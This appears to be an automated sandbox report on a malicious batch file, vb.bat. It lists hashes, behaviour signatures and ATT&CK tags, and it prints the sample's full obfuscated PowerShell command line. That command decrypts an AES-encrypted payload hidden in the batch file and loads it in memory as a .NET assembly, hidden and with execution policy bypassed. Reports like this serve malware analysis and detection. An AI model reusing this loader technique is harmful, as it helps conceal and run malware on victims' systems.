ac821c02af3b7eab9fec420f8f318ccbf9309f7b3d7bd50c0860fd3e8614d1d5

Analysis

max time kernel
42s
max time network
45s
platform
windows7_x64
resource
win7-20220812-en
resource tags

arch:x64arch:x86image:win7-20220812-enlocale:en-usos:windows7-x64system
submitted
26-01-2023 05:52

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

vb.bat
Size

49KB
MD5

6f5df197740503ef41d815c9366c665b
SHA1

05d2eb5d6dc5255f15679089a01a1c091e7564db
SHA256

37073ac11600c6c5d053cb537a5be9a4153f5b8720645b8852ba882f58a0510b
SHA512

cea369f2130fe84f02dcb2eab43c7bccaa14a97305a80c31b7013d436651e1cd7b3216b2407333dd99b4111d01b2bb129a621f22cdf760c446154ece12a86bca
SSDEEP

768:i3cYe7RNiqxH5VnLrd+hwoin6XY+kaVKgsvi8nMPj7YTwE3Bs52Hz4Cd8y:i9wyqxDLr6kaVRbKweByaF8y

Score

8^/10

Malware Config

Signatures

Executes dropped EXE 1 IoCs

Processes:

vb.bat.exe

pid process

280 vb.bat.exe
Deletes itself 1 IoCs

Processes:

cmd.exe

pid process

1324 cmd.exe
Loads dropped DLL 1 IoCs

Processes:

cmd.exe

pid process

1324 cmd.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Suspicious behavior: EnumeratesProcesses 1 IoCs

Processes:

vb.bat.exe

pid process

280 vb.bat.exe
Suspicious use of AdjustPrivilegeToken 1 IoCs

Processes:

vb.bat.exe

description pid process

Token: SeDebugPrivilege 280 vb.bat.exe

pid	process
280	vb.bat.exe

pid	process
1324	cmd.exe

pid	process
1324	cmd.exe

pid	process
280	vb.bat.exe

description	pid	process
Token: SeDebugPrivilege	280	vb.bat.exe

Suspicious use of WriteProcessMemory 3 IoCs

Processes:

cmd.exe

description	pid	process	target process
PID 1324 wrote to memory of 280	1324	cmd.exe	vb.bat.exe
PID 1324 wrote to memory of 280	1324	cmd.exe	vb.bat.exe
PID 1324 wrote to memory of 280	1324	cmd.exe	vb.bat.exe

C:\Windows\system32\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\vb.bat"
1⤵
- Deletes itself
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1324

C:\Users\Admin\AppData\Local\Temp\vb.bat.exe
"vb.bat.exe" -noprofile -windowstyle hidden -ep bypass -command $qqyMV = [System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\vb.bat').Split([Environment]::NewLine);foreach ($ICMlF in $qqyMV) { if ($ICMlF.StartsWith(':: ')) { $IBnmy = $ICMlF.Substring(3); break; }; };$AdBjf = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($IBnmy);$ruWiS = New-Object System.Security.Cryptography.AesManaged;$ruWiS.Mode = [System.Security.Cryptography.CipherMode]::CBC;$ruWiS.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$ruWiS.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('h8tmMOXTbP0K73mnEEbNk0vFx/55iFdu0OSzcb3a/ds=');$ruWiS.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('JidxI5QL6Wi/mgR0o3b2Ew==');$dZVTP = $ruWiS.CreateDecryptor();$AdBjf = $dZVTP.TransformFinalBlock($AdBjf, 0, $AdBjf.Length);$dZVTP.Dispose();$ruWiS.Dispose();$fpJAU = New-Object System.IO.MemoryStream(, $AdBjf);$pIUUN = New-Object System.IO.MemoryStream;$qKnNZ = New-Object System.IO.Compression.GZipStream($fpJAU, [IO.Compression.CompressionMode]::Decompress);$qKnNZ.CopyTo($pIUUN);$qKnNZ.Dispose();$fpJAU.Dispose();$pIUUN.Dispose();$AdBjf = $pIUUN.ToArray();$NqisE = [System.Reflection.Assembly]::('daoL'[-1..-4] -join '')($AdBjf);$mKjMY = $NqisE.EntryPoint;$mKjMY.Invoke($null, (, [string[]] ('')))
2⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:280

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\vb.bat.exe

Filesize
462KB

MD5
852d67a27e454bd389fa7f02a8cbe23f

SHA1
5330fedad485e0e4c23b2abe1075a1f984fde9fc

SHA256
a8fdba9df15e41b6f5c69c79f66a26a9d48e174f9e7018a371600b866867dab8

SHA512
327dc74590f34185735502e289135491092a453f7f1c5ee9e588032ff68934056ffa797f28181267fd9670f7895e1350894b16ea7b0e34a190597f14aea09a4d

Download Submit
\Users\Admin\AppData\Local\Temp\vb.bat.exe

Filesize
462KB

MD5
852d67a27e454bd389fa7f02a8cbe23f

SHA1
5330fedad485e0e4c23b2abe1075a1f984fde9fc

SHA256
a8fdba9df15e41b6f5c69c79f66a26a9d48e174f9e7018a371600b866867dab8

SHA512
327dc74590f34185735502e289135491092a453f7f1c5ee9e588032ff68934056ffa797f28181267fd9670f7895e1350894b16ea7b0e34a190597f14aea09a4d

Download Submit
memory/280-55-0x0000000000000000-mapping.dmp

Download
memory/280-57-0x000007FEFB881000-0x000007FEFB883000-memory.dmp

Filesize
8KB

Download
memory/280-59-0x000007FEF3C60000-0x000007FEF47BD000-memory.dmp

Filesize
11.4MB

Download
memory/280-60-0x0000000001FA4000-0x0000000001FA7000-memory.dmp

Filesize
12KB

Download
memory/280-61-0x0000000001FA4000-0x0000000001FA7000-memory.dmp

Filesize
12KB

Download
memory/280-62-0x0000000001FAB000-0x0000000001FCA000-memory.dmp

Filesize
124KB

Download